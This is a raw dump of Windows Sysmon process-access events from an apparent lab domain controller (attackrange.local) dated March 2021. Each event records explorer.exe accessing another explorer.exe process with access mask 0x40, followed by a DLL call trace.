16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244659Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244658Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244657Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244656Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244655Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244654Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244653Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244652Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244651Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244650Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244649Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244648Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244647Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244646Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244645Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244644Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244643Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244642Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244641Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244640Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244639Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244638Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244637Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244636Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244635Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244634Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244633Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244632Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 